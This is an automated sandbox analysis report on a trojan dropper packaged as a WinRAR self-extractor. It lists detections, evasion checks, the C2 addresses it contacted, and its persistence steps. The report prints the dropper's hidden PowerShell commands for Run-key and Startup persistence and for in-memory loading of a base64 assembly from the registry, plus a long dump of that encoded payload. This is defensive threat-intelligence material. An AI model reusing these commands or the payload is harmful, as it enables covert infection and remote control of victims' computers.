12.8
0-day

702221e0753dc7bdae96ab782721c0e3a58d5d51d15f74af56c662f92f120125

a6f7c0e5ca9c0851ca59d54ef99d49ce.exe

Analysis duration

116s

Last analyzed

File size

128.2KB
Static detections / Dynamic detections: AI SCORE=88 ARTEMIS CONFIDENCE DHEM DOWNLOADER33 EXPKIT FHFKUA GENERICKD HIGH CONFIDENCE KCLOUD LJ0FFSRMCOC MALWARE@#2YKFO27WO1516 NEMUCOD SCORE TOPIS UNSAFE YHIEN YMACCO
Hawkeye engine
Not scanned; no Hawkeye engine results available
Static verdict
Antivirus engines
Engine Result Scan date Version
McAfee Artemis!A6F7C0E5CA9C 20201211 6.0.6.653
CrowdStrike win/malicious_confidence_60% (W) 20190702 1.0
Baidu JS.Trojan-Downloader.Nemucod.yi 20190318 1.0.0.2
Avast Other:Malware-gen [Trj] 20201210 21.1.5827.0
Alibaba Trojan:VBS/Injector.d61e6008 20190527 0.3.0.5
Kingsoft Win32.Troj.Undef.(kcloud) 20201211 2017.9.26.565
Tencent 20201211 1.0.0.1
Static indicators
Queries for the computername (25 events)
Checks if process is being debugged by a debugger (4 events)
Time & API Arguments Status Return Repeated
1619832778.453626
IsDebuggerPresent
failed 0 0
1619832791.265249
IsDebuggerPresent
failed 0 0
1619832791.187249
IsDebuggerPresent
failed 0 0
1619832793.406876
IsDebuggerPresent
failed 0 0
Command line console output was observed (12 events)
Time & API Arguments Status Return Repeated
1619832784.249626
WriteConsoleW
buffer: PS C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2>
console_handle: 0x0000000f
success 1 0
1619832796.968249
WriteConsoleW
buffer: PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\M
console_handle: 0x0000001f
success 1 0
1619832796.999249
WriteConsoleW
buffer: icrosoft\Windows\CurrentVersion\Run
console_handle: 0x00000023
success 1 0
1619832797.281249
WriteConsoleW
buffer: PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\M
console_handle: 0x00000027
success 1 0
1619832797.296249
WriteConsoleW
buffer: icrosoft\Windows\CurrentVersion
console_handle: 0x0000002b
success 1 0
1619832797.312249
WriteConsoleW
buffer: PSChildName : Run
console_handle: 0x0000002f
success 1 0
1619832797.312249
WriteConsoleW
buffer: PSDrive : HKCU
console_handle: 0x00000033
success 1 0
1619832797.312249
WriteConsoleW
buffer: PSProvider : Microsoft.PowerShell.Core\Registry
console_handle: 0x00000037
success 1 0
1619832797.328249
WriteConsoleW
buffer: microsoft : C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs
console_handle: 0x0000003b
success 1 0
1619832797.406249
WriteConsoleW
buffer: PS C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2>
console_handle: 0x0000000f
success 1 0
1619832797.281249
WriteConsoleW
buffer: PS C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2>
console_handle: 0x0000000f
success 1 0
1619832798.093876
WriteConsoleW
buffer: PS C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2>
console_handle: 0x0000000f
success 1 0
Uses Windows APIs to generate a cryptographic key (50 out of 234 events)
This executable has a PDB path (1 event)
pdb_path d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)
Time & API Arguments Status Return Repeated
1619832775.437626
GlobalMemoryStatusEx
success 1 0
Behavioral verdict
Dynamic indicators
Performs some HTTP requests (3 events)
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o76n7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.105&mm=28&mn=sn-j5o76n7e&ms=nvh&mt=1619803697&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r4---sn-j5o76n7l.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=74ddce77771dfc27&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619803937&mv=m
Allocates read-write-execute memory (usually to unpack itself) (50 out of 658 events)
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Creates executable files on the filesystem (3 events)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\microsoft.vbs
Creates a shortcut to an executable file (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Creates a suspicious process (8 events)
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
cmdline powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
cmdline powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
cmdline powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
cmdline powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
A process created a hidden window (8 events)
Time & API Arguments Status Return Repeated
1619832774.921249
CreateProcessInternalW
thread_identifier: 2452
thread_handle: 0x000002c0
process_identifier: 2984
current_directory: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000308
inherit_handles: 0
success 1 0
1619832774.921249
ShellExecuteExW
parameters: -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
filepath: powershell
filepath_r: powershell
show_type: 0
success 1 0
1619832785.312124
CreateProcessInternalW
thread_identifier: 1824
thread_handle: 0x000002c0
process_identifier: 1272
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000308
inherit_handles: 0
success 1 0
1619832785.328124
ShellExecuteExW
parameters: -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
filepath: powershell
filepath_r: powershell
show_type: 0
success 1 0
1619832785.531124
CreateProcessInternalW
thread_identifier: 2040
thread_handle: 0x000002b0
process_identifier: 2008
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x000002c0
inherit_handles: 0
success 1 0
1619832785.531124
ShellExecuteExW
parameters: -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
filepath: powershell
filepath_r: powershell
show_type: 0
success 1 0
1619832785.890124
CreateProcessInternalW
thread_identifier: 2900
thread_handle: 0x000001b8
process_identifier: 1176
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x000002c0
inherit_handles: 0
success 1 0
1619832785.906124
ShellExecuteExW
parameters: -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
filepath: powershell
filepath_r: powershell
show_type: 0
success 1 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)
Time & API Arguments Status Return Repeated
1619832779.781626
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1619832792.437249
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1619832792.124249
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1619832794.156876
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
Network communication
Communicates with host for which no DNS query was performed (3 events)
host 172.217.24.14
host 193.56.28.101
host 91.193.75.158
Installs itself for autorun at Windows startup (2 events)
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\microsoft reg_value C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs
Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config (2 events)
Time & API Arguments Status Return Repeated
1619832785.562124
RegSetValueExA
key_handle: 0x00000310
regkey_r: microsoft
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\microsoft
success 0 0
1619832785.562124
RegSetValueExA
key_handle: 0x00000310
HJiBABwFCggAAAKbyEAAAoK3hMoFQAACgBy/QIAcAooFgAACt4ABioAARAAAAAAAQAZGgATGAAAARMwAwA@AAAADQAAEQAgAAEAAHNhAAAKCygVAAAGBwdvYgAACigWAAAGJgIHb2MAAAooIwAABigeAAAKCisABioTMAIAEQAAAA4AABEAKGQAAAoDb2UAAAoKKwAGKgAAABMwAgARAAAADwAAEQAoZAAACgNvZgAACgorAAYqAAAAEzAGAJUAAAAQAAARAHNnAAAKC3MuAAAKDHMuAAAKDQIDKCAAAAYEFRYoDQAAChMECAMWEQQWmm9OAAAKb2gAAAoACQMRBBaab@4AAAoEb@4AAArWA45pEQQWmm9OAAAKBG9OAAAK1tpvaAAACgAHCG9pAAAKb2oAAAoABwlvaQAACm9qAAAKAAhvawAACgAJb2sAAAoAB29sAAAKCisABioAAAATMAQAgQAAABEAABEAcy4AAAoLBwMWA45pb2gAAAoABxZqb2@AAAoABxYXc24AAAoMcy4AAAoNH@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@AbgAGAAcBogAGADABHwEGAEMBHwEKAGgBSgEWAIoBdQEGAKkBHwEKAMsBtQEKANMBtQEGAOcBbgAKACEC+gEGADACbgAOAFwCRAIKAGwC+gEGAJMCbgAGAMUCbgAKANIC+gEKAOoC+gEGABYDBgMGACIDBgMGAHEDbgAGAIEDCgAGAJ8DbgAGAM4DbgAGANQDbgAGAPcDbgAGAP@DbgAGACgEFgQGAEkEPwQOAFYEogAGAHsEbgAOAL8ErAQGABoFbgAOAB8FrAQGADQFHwEOAIgFrAQGAN4FbgAGAC4GbgAGAEoGNQYOAH@GcgYOAI@GcgYOAKcGcgYGAM@GwQYKANsGtQEKAO8GtQESABYHBAffADEHAAASAEwHBAcSAF@HBAcSAIgHBAcGAMMHbgAGAOgHwQYGACsIEAgGAEQIPwQOAGEISwgOAHkISwgGAKwIbgAAAAAAAQAAAAAAAQABAAABAAAPCQAADQABAAEAAQAQACYJLQkhAAEABQAFIQAAPwkAACEAFQAmAAABAABLCQAAIQAYACoAEwEAAGoJAAAJARoAKgATAQAAhwkAAAkBGgAqAAYAEgpTAgYAFQpWAgYAFwpTAgYAGgpWAgYAHQpZAgYAIApZAgYAJQpdAgYAJwpdAgYAKgpgAgYAMApgAgYANgpfAAYAOQpfAAYAPwpdAgYAQQpdAhYAQwpfABYARwpfABYASwpkAhYATwpoAhYAUgpfABYAVgpsAjYAxAvVAhYAxwvZAhYAzgvdAjMB+AvoAjMBIQzsAgAAAAADAAYYSgATAAEAAAAAAAMARgO9CUUCAwAAAAAAAwBGA+@JTQIFAAAAAAADAEYDCwoGAAYAgyAAAAAAERhZCkoABgC4IAAAAAAGGEoABgAGAIghAAAAABYAYApKAAYApCEAAAAABgBlCgYABgDcIQAASAAGAG@KBgAGAIAiAAAAAAYAcQoGAAYAtCIAAAAABgB1CnACBgD8KQAAAAAGAHwKdgIHAGAsAAAAAAYAkgqVAREAhCwAAAAABgCVCoQCEgDALAAAAAAGAJgKBgAVALA1AAAAAAYAnAqLAhUA3DUAAAAABgCfCnACFQBEOAAAAAAGAJ8KCgAWAFg4AAAAAAYApAqLAhcAAAAAAIAAESCnCo8CFwAAAAAAgAARIM@KowIfAAAAAACAABEg5QqnAh8AAAAAAIAAFiAFC7ACIgAAAAAAgAAWIEQLuwInALA4AAAAAAYAXQuSACgAIDkAAAAABgBhC5IAKACMOQAAAAAWAGYLDwAoACg6AAAAAAYAaQvAAigANDsAAAAABgB8C4sCKQCAOwAAAAAGAH8LkgApAMA7AAAAAAYAgwuxASkA4DsAAAAABgCIC7cBKgAAPAAAAAAGAIsLxQIrAKQ8AAAA
AAYAkgvOAi@AND@AAAAABgCdC5UBLgBYPQAAAAAGAKoLlQEvAHo9AAAAAAEIsQsuATAAiD@AAAAABhhKAAYAMQCQPQAAAAARGFkKSgAxAJw9AAAAAAMI1gvhAjEAxz@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@CVAC5AK@CSgBpAL8CWgDJAMwCXwDRANwCYgDZAPYCaQDJAP8CbgDpACsDdQDRADcDeQDZAPYCfwDhAEkDhADpAFQDiwBBAPYCkgDZAF@DlgDZAGcDmwDZAPYCoADJAP8CpQChAHkDqwD5AJADvACpALEDwQDZAMMDyQD5AOcD@AAhAQUE2gApATEE4ADpADYE6AAxAUoABgA5AV4E7wA5AXAE9QBBAYIE+QDRAI4E/gDRAMoEBQHRAOEEeQDZAGcDDAHRAOsE/gDRAAsFeQDZAF@DEQHJACsFGQFhAUoAEwBpAEoAHgGhAE@FJQFpAD4CLgEJAVoFMwGhAGUFNwGhAHkFQgFpAUoABgBpAZIFAQBpAaUFAQBpAbUFAQBpAcgFAQDJAP8CUwHJAP8CWwFxAeoFDwBxAfoFDwBxAAcGkgBxABYGYQGBAVYGZQGBAWkGkgDJAFoFMwGJAYEGDwCJAZkGawGRAbEGcgEJAVQDeQGZAfYCkgCpAecGfgGxAfoGaQCJAP4GaQDRAUoACgDRAXYHgwG5AXoHiQHBAZ@HjwHZAakHlQEhAbIHEQHBAboHmgHhAc8HBgCpAdcHngHRAUoApQGhAUoAAQChAdsHMwGhAfYCkgDpAfEHqwHpAf@HsQHpAQYItwEUAEoABgAxATIIxQExATgIzQEUAEAI@gH5Ac8HBgAUADgI2AExAWwI3gEBAkoA4wEBAokI7gH5AY4IBgDpAZQIqwEhAZ@I9gEuABMA+QIuAAsA8AJDACMAEwJDABsADgKDABsADgKjABsADgLgAHMADgKgBBsADgKgBDMADgIABTMADgIvAKECMQChAjsAoQJHAKECSwChAgEAKwAAAAYAAQAGAAAABwAYAx4DOAM+A2oDdQN5A54DqQOzA7sDxgPTA9oD3wPjA/gDzAjVCNwI6QjvCPwIFgG9AUMBKQCrCgEAQwErANEKAgBGAS@A5QoCAEMBLwAFCwMAAAExAEQLBABQIAAAGABYIAAAGQAEgAAAAAAAAAAAAAAAAAAAAABKDAAAAgAAAAAAAAAAAAAA/AEGCQAAAAAIAAAAAAAAAAAAAAAFArUBAAAAAAIAAAAAAAAAAAAAAPwBbgAAAAAAAgAAAAAAAAAAAAAABQIEBwAAAAACAAAAAAAAAAAAAAD8AXUBAAAAAAQAAwAGAAUABwAFAAAAAAAAPE1vZHVsZT4AU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR@cmlidXRlAC5jdG9yAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR@cmlidXRlAFN5c3RlbQBNdWx@aWNhc3REZWxlZ2F@ZQBDb21waWxlckdlbmVyYXRlZEF@dHJpYnV@ZQBTeXN@ZW@uRGlhZ25vc3RpY3MARGVidWdnZXJEaXNwbGF5QXR@cmlidXRlAElBc3luY1Jlc3VsdABBc3luY@NhbGxiYWNrAE9iamVjdABFdmVudEhhbmRsZXIARXZlbnRBcmdzAERlYnVnZ2VySGlkZGVuQXR@cmlidXRlAFN5c3RlbS5UaHJlYWRpbmcATXV@ZXgAUmVsZWFzZU11dGV4AFRocmVhZABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBDb21wdXRlckluZm8AU3lzdGVtLldpbmRvd3MuRm9ybXMAQXBwbGljYXRpb24AZ2V@X@V4ZWN1dGFibGVQYXRoAFRocmVhZFN@YXJ@AE1pY3Jvc29mdC5WaXN1YWxCYXNpYwBTdHJpbmdzAE
NvbXBhcmVNZXRob2QAU3BsaXQAU1RBVGhyZWFkQXR@cmlidXRlAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAE5ld@xhdGVCaW5kaW5nAFR5cGUATGF@ZUNhbGwAU3RhcnQAU3lzdGVtLkNvZGVEb2@uQ29tcGlsZXIAQ29tcGlsZXJSZXN1bHRzAFByb2plY3REYXRhAEVuZEFwcABhZGRfQXBwbGljYXRpb25FeGl@AEV4Y2VwdGlvbgBTZXRQcm9qZWN@RXJyb3IAQ2xlYXJQcm9qZWN@RXJyb3IAU2xlZXAAU3RyaW5nAEVtcHR5AE9wZXJhdG9ycwBDb21wYXJlU3RyaW5nAENvbnZlcnNpb25zAFRvU3RyaW5nAENvbmNhdABNaWNyb3NvZnQuV2luMzIAUmVnaXN@cnlLZXkAUmVnaXN@cnkAQ3VycmVudFVzZXIAQ29uY2F@ZW5hdGVPYmplY3QAT3BlblN1YktleQBHZXRWYWx1ZQBUb@ludGVnZXIAVG9Cb29sZWFuAEJvb2xlYW4ATGF@ZUdldABSdW5@aW1lSGVscGVycwBHZXRPYmplY3RWYWx1ZQBSdW5@aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBDaGFuZ2VUeXBlAEFycmF5AFJ1bnRpbWVGaWVsZEhhbmRsZQBJbml@aWFsaXplQXJyYXkASW5@MzIAQ29udmVydABGcm9tQmFzZTY@U3RyaW5nAFN5c3RlbS5SZWZsZWN@aW9uAEFzc2VtYmx5AExvYWQAU2V@VmFsdWUAU3lzdGVtLklPAE1lbW9yeVN@cmVhbQBQcm9jZXNzAEdldEN1cnJlbnRQcm9jZXNzAGdldF9IYW5kbGUASW5@UHRyAG9wX@V4cGxpY2l@AENvbmRpdGlvbmFsQ29tcGFyZU9iamVjdEVxdWFsAFN5c3RlbS5OZXQuU29ja2V@cwBTZWxlY3RNb2RlAENvbXBhcmVPYmplY3RMZXNzRXF1YWwAQW5kT2JqZWN@AENvbmRpdGlvbmFsQ29tcGFyZU9iamVjdEdyZWF@ZXIAU3VidHJhY3RPYmplY3QAQnl@ZQBTb2NrZXRGbGFncwBDb25@YWlucwBQYXJhbWV@ZXJpemVkVGhyZWFkU3RhcnQATGF@ZUluZGV4R2V@AGdldF9MZW5ndGgATGF@ZUluZGV4U2V@Q29tcGxleABMYXRlU2V@Q29tcGxleABUY3BDbGllbnQAc2V@X1JlY2VpdmVUaW1lb3V@AHNldF9TZW5kVGltZW91dABzZXRfU2VuZEJ1ZmZlclNpemUAc2V@X1JlY2VpdmVCdWZmZXJTaXplAEVudmlyb25tZW5@AGdldF9NYWNoaW5lTmFtZQBnZXRfVXNlck5hbWUAZ2V@X@9TRnVsbE5hbWUAZ2V@X1RvdGFsUGh5c2ljYWxNZW1vcnkAVUludDY@AFN5c3RlbS5HbG9iYWxpemF@aW9uAEN1bHR1cmVJbmZvAGdldF9DdXJyZW5@Q3VsdHVyZQBnZXRfTmFtZQBTeXN@ZW@uTmV@AERucwBHZXRIb3N@TmFtZQBJUEhvc3RFbnRyeQBHZXRIb3N@QnlOYW1lAElQQWRkcmVzcwBnZXRfQWRkcmVzc@xpc3QAU3lzdGVtLlRleHQAU3RyaW5nQnVpbGRlcgBJbnRlcmFjdGlvbgBFbnZpcm9uAENvbnZlcnNpb24ASGV4AFNwYWNlAFN5c3RlbS5NYW5hZ2VtZW5@AE1hbmFnZW1lbnRPYmplY3RDb2xsZWN@aW9uAE1hbmFnZW1lbnRPYmplY3RFbnVtZXJhdG9yAE1hbmFnZW1lbnRPYmplY3QATWFuYWdlbWVudE9iamVjdFNlYXJjaGVyAEdldABHZXRFbnVtZXJhdG9yAE1hbmFnZW1lbnRCYXNlT2JqZWN@AGdldF9DdXJyZW5@AGdldF9JdG
VtAFRvSW5@MzIATW92ZU5leHQASURpc3Bvc2FibGUARGlzcG9zZQBJSWYAZ2V@X@NhcGFjaXR5AEVuY29kaW5nAGdldF9EZWZhdWx@AEdldEJ5dGVzAEdldFN@cmluZwBTeXN@ZW@uQ29sbGVjdGlvbnMuR2VuZXJpYwBMaXN@YDEAV3JpdGUAVG9BcnJheQBBZGQAU3RyZWFtAFN5c3RlbS5JTy5Db21wcmVzc2lvbgBHWmlwU3RyZWFtAHNldF9Qb3NpdGlvbgBDb21wcmVzc2lvbk1vZGUAUmVhZABDbG9zZQBnZXRfVVRGOABUb@Jhc2U2NFN@cmluZwBWYWx1ZVR5cGUATnVjbGVhciBFeHBsb3Npb24uZXhlAGtlcm5lbDMyAHVzZXIzMgBhdmljYXAzMi5kbGwAcHNhcGkAa2VybmVsMzIuZGxsAG5@ZGxsLmRsbABtc2NvcmxpYgBWQiRBbm9ueW1vdXNEZWxlZ2F@ZV8wAEF@b21pYwBOdWNsZWFyX@V4cGxvc2lvbgBfQ2xvc3VyZSRfXwA8UHJpdmF@ZUltcGxlbWVudGF@aW9uRGV@YWlscz4AX19TdGF@aWNBcnJheUluaXRUeXBlU2l6ZT@@MwBfX1N@YXRpY@FycmF5SW5pdFR5cGVTaXplPTYAVGFyZ2V@T2JqZWN@AFRhcmdldE1ldGhvZABCZWdpbkludm9rZQBEZWxlZ2F@ZUNhbGxiYWNrAERlbGVnYXRlQXN5bmNTdGF@ZQBFbmRJbnZva2UARGVsZWdhdGVBc3luY1Jlc3VsdABJbnZva2UAT1cAQwBDbgBTQwBQVABJTlNUAEkATVMASG9zdHMAUG9ydHMASUQATVVURVgASABQAFNQTABBcHAAU@NHAERJAEtleQBNVAAuY2N@b3IATWFpbgBFeGVjdXRlAElOUwBQaW4AZGF@YQBiAElOVgBOAEJ5dGVzAFMATQBNRDUAQgBMQQBJUgBNQUMAQ@sAU2VuZABJUABHVkkAR2V@Vm9sdW1lSW5mb3JtYXRpb25BAFYAVABRAEcASgBYAEdGVwBHZXRGb3JlZ3JvdW5kV2luZG93AEdldFdpbmRvd1RleHQAaFduZABscFN@cmluZwBjY2gAY2FwR2V@RHJpdmVyRGVzY3JpcHRpb25BAHdEcml2ZXIAbHBzek5hbWUAY2JOYW1lAGxwc3pWZXIAY2JWZXIARW1wdHlXb3JraW5nU2V@AGhQcm9jZXNzAEhXRABDSVZDAE9QAEdldFByb2R1Y3QAUHJvZHVjdABNUABHQVcAU@IAcwBCUwBmeABXUkQARGVjb21wcmVzcwBFbmNvZGUASW5wdXQARGVjb2RlAF9MYW1iZGEkX19SMzItMgBhMAAkSQAkSTI@LTAAJElSMjQtMQBfTGFtYmRhJF9fUjI@LTEAYTEAX@xhbWJkYSRfXzI@LTAAMDNDN@Y@RThGQjM1OUFFQzBFRUYwODE@QjY2QTcwNEZDNDNGQjNBOAA1QjFFRTdDQUQzREZGMjIwQTk1RDFENkI5MTQzNUQ5RTE1MjBBQzQxAE51Y2xlYXIgRXhwbG9zaW9uAAARKgAtAF@ATgBLAFsALQAqAAEZYQBjAGgAaQBsAGwAZQBwAG8AdwBlAHIAADkxADkAMwAuADUANgAuADIAOAAuADEAMAAxACwAOQAxAC4AMQA5ADMALgA3ADUALgAxADUAOAAsAAADLAAAFTcANwA4ADgALAA3ADcAOAA4ACwAAAlVAG@ARQA9AAAfSwBhAHcAcgBIAEoAZgBXAGYAaABhAFIAQwBsAGcAAAtTAHQAYQByAHQAAAdQAE4AQwAAA1AAAANXAAAFSQBFAAATUwBvAGYAdAB3AGEAcgBlAFwAAANcAAADXwAAN@gASwBF